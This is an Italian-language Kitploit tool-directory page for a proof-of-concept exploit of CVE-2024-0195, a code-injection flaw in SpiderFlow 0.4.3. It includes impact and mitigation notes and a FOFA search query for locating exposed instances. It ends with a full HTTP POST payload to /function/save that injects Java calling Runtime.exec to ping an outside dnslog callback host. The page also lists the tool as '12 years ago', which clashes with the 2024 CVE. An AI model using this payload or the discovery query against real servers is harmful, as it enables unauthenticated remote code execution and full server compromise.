Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-0195-SpiderFlow — Exploit proof-of-concept per CVE-2024-0195, una critica vulnerabilità di iniezione del codice in SpiderFlow 0.4.3 che consente l'esecuzione remota di codice tramite l'endpoint FunctionService.saveFunction. | Kitploit
Strumenti/GitHubGitHub/hack-with-rohit/cve-2024-0195-spiderflow
Analisi delle VulnerabilitàAnalisi del CodiceExploitSfruttamento di Applicazioni WebPenetration TestingRed Teaming
GitHubhack-with-rohit/cve-2024-0195-spiderflow

CVE-2024-0195-SpiderFlow

Exploit proof-of-concept per CVE-2024-0195, una critica vulnerabilità di iniezione del codice in SpiderFlow 0.4.3 che consente l'esecuzione remota di codice tramite l'endpoint FunctionService.saveFunction.

Vedi Repository
12 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2024-0195 Controllo Improprio della Generazione di Codice ('Code Injection') Critico 2024

Riepilogo

CVE-2024-0195 è una vulnerabilità critica di code injection nell'applicazione web spider-flow 0.4.3, in particolare nella funzione FunctionService.saveFunction del file FunctionController.java. Un attaccante può iniettare codice dannoso da remoto che viene eseguito sul server. Ciò consente il completo compromesso dell'applicazione.

Impatto..

Questa vulnerabilità è estremamente grave poiché consente l'esecuzione remota di codice sul server che ospita l'applicazione spider-flow vulnerabile. Un attaccante potrebbe compromettere completamente il server, rubare dati sensibili, installare malware o crypto miner, e utilizzarlo per ulteriori attacchi all'interno della rete. La riservatezza, l'integrità e la disponibilità dell'applicazione e del server sono tutte criticamente compromesse.

Patch

Non viene menzionata esplicitamente una versione corretta, quindi la correzione attualmente non sembra essere un'opzione. La vulnerabilità è stata divulgata pubblicamente e gli exploit sono disponibili, quindi è fondamentale un'immediata mitigazione.

Mitigazione

Fino al rilascio di una patch ufficiale, spider-flow 0.4.3 dovrebbe essere immediatamente messo offline o l'accesso limitato solo a reti/utenti fidati. I firewall per applicazioni web o altri controlli di validazione degli input potrebbero potenzialmente essere configurati per rilevare e bloccare i tentativi di code injection come mitigazione temporanea. Tuttavia, queste non sono soluzioni complete e la versione vulnerabile dovrebbe essere aggiornata non appena una release corretta è disponibile.

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Sfruttamento

FOFA : app="spiderflow"

✔ Prova di concetto

root@kitploit:~
POST /function/save HTTP/1.1
Host: 192.168.116.128:8080
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 139

id=&name=test&parameter=test&script=return+java.lang.%2F****%2FRuntime%7D%3Br%3Dtest()%3Br.getRuntime().exec('ping+18k2tu.dnslog.cn')%3B%7B
Scarica lo strumento